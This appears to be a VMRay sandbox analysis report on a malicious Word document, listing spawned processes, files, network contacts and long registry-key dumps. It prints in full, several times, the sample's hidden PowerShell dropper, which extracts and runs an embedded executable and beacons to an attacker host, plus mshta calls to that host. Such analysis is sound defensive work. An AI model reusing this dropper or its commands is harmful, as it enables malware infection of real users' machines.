VMRay Analyzer Report for Sample #19989
VMRay Analyzer 2.2.0

URI www.samyrai777m.p-host.in Resolved_To Address 185.211.244.133

Process 1 2480 winword.exe 1324 winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" C:\Users\aETAdzjz\Desktop\ c:\program files\microsoft office\root\office16\winword.exe
Process 2 2976 csc.exe 2480 csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline" C:\Users\aETAdzjz\Desktop\ c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe
Process 3 3000 cvtres.exe 2976 cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\aETAdzjz\AppData\Local\Temp\RESEDB9.tmp" "c:\Users\aETAdzjz\Desktop\CSCED98.tmp" C:\Users\aETAdzjz\Desktop\ c:\windows\microsoft.net\framework64\v2.0.50727\cvtres.exe
Process 4 3008 mshta.exe 2480 mshta.exe "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 C:\Users\aETAdzjz\Desktop\ c:\windows\system32\mshta.exe
Process 5 3016 mshta.exe 2480 mshta.exe "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 C:\Users\aETAdzjz\Desktop\ c:\windows\system32\mshta.exe
Process 6 988 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe
Process 7 880 mshta.exe 2480 mshta.exe "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 C:\Users\aETAdzjz\Desktop\ c:\windows\system32\mshta.exe
Process 8 1636 powershell.exe 3016 powershell.exe "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} C:\Users\aETAdzjz\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process 9 684 powershell.exe 3008 powershell.exe "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} C:\Users\aETAdzjz\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process 10 2408 powershell.exe 880 powershell.exe "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} C:\Users\aETAdzjz\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process 11 1524 taskkill.exe 684 taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im winword.exe C:\Users\aETAdzjz\Desktop\ c:\windows\system32\taskkill.exe
Process 12 844 svchost.exe 476 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs C:\Windows\system32\ c:\windows\system32\svchost.exe

File windows\microsoft.net\framework64\v2.0.50727\config\machine.config windows\microsoft.net\framework64\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config config
File users\aetadzjz\desktop\logo.cs users\aetadzjz\desktop\logo.cs c:\ c:\users\aetadzjz\desktop\logo.cs cs MD5 667a8968a36880dc4147d2ce00c64b30 SHA1 48233228f9babdd3bcac5b85d5ae258f91204f7e SHA256 8aea15951d21f30f44a8d7499472b62473203959659eeb2b9059b64698deacfd
File users\aetadzjz\appdata\local\temp\91rxrejg.tmp users\aetadzjz\appdata\local\temp\91rxrejg.tmp c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
File users\aetadzjz\appdata\local\temp\91rxrejg.0.cs users\aetadzjz\appdata\local\temp\91rxrejg.0.cs c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.0.cs cs MD5 3992ea6c0751d769815a98c4cffcadce SHA1 6ba244d7eb6a6facd2b4c4e946e26987d2336e8b SHA256 b12a34c289c97db64f4267e5c67b70f4fefedfe28ae6527e7721a6ef3e4e0adc
File users\aetadzjz\appdata\local\temp\91rxrejg.cmdline users\aetadzjz\appdata\local\temp\91rxrejg.cmdline c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.cmdline cmdline MD5 8d42a6a6ddda3cb8546ef4cb888dbfa8 SHA1 2024365b4311bc93867119ceee7c876683fef607 SHA256 f0d80af454b0e9060f13236c0827a4df63d61ac4964a174c999f4aa2895ff00e
File users\aetadzjz\appdata\local\temp\91rxrejg.out users\aetadzjz\appdata\local\temp\91rxrejg.out c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.out out MD5 51bfb6f473aa25324ee1ed9830ca806e SHA1 f1fae130030df5b4dff15ed820ca35665886ea98 SHA256 60a57285c3ccbfa3f03f050681e54c27de4ef1766fe6151104a919b7f7c8fa2e
File users\aetadzjz\appdata\local\temp\91rxrejg.err users\aetadzjz\appdata\local\temp\91rxrejg.err c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.err err MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
File STD_INPUT_HANDLE
File users\aetadzjz\appdata\local\temp\91rxrejg.pdb users\aetadzjz\appdata\local\temp\91rxrejg.pdb c:\ c:\users\aetadzjz\appdata\local\temp\91rxrejg.pdb pdb
File users\aetadzjz\desktop\__sn.cs users\aetadzjz\desktop\__sn.cs c:\ c:\users\aetadzjz\desktop\__sn.cs cs
File windows\system32\com\soapassembly windows\system32\com\soapassembly c:\ c:\windows\system32\com\soapassembly

Mutex Global\.net clr networking
Mutex Global\.net clr networking
Mutex
Global\.net clr networking

DNSRecord www.samyrai777m.p-host.in
SocketAddress 185.211.244.133 80 TCP
NetworkSocket 185.211.244.133 80 TCP Contains SocketAddress www.samyrai777m.p-host.in 80
NetworkConnection HTTP www.samyrai777m.p-host.in 80
URI www.samyrai777m.p-host.in/t/tp.php?thread=0 Contains URI None

File STD_INPUT_HANDLE
File STD_OUTPUT_HANDLE
File STD_ERROR_HANDLE
Mutex Local\!PrivacIE!SharedMemory!Mutex
File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml
File conout$
File users\aetadzjz\appdata\roaming\result.exex users\aetadzjz\appdata\roaming\result.exex c:\ c:\users\aetadzjz\appdata\roaming\result.exex exex
File users\aetadzjz\appdata\roaming\result.exex
users\aetadzjz\appdata\roaming\result.exex c:\ c:\users\aetadzjz\appdata\roaming\result.exex exex MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 WinRegistryKey Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word\Resiliency HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft 
HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 
HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey 
Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER 
WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey 
Software\Microsoft\Office\12.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\12.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word\Resiliency HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey 
Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER 
WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\14.0 HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Word\Resiliency HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Word HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER WinRegistryKey Software HKEY_CURRENT_USER WinRegistryKey Software\Microsoft HKEY_CURRENT_USER mq* |5, File STD_INPUT_HANDLE File windows\system32\windowspowershell\v1.0\getevent.types.ps1xml windows\system32\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\types.ps1xml windows\system32\windowspowershell\v1.0\types.ps1xml c:\ 
c:\windows\system32\windowspowershell\v1.0\types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File conout$ File users\aetadzjz\appdata\roaming\result.exex users\aetadzjz\appdata\roaming\result.exex c:\ c:\users\aetadzjz\appdata\roaming\result.exex exex WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN 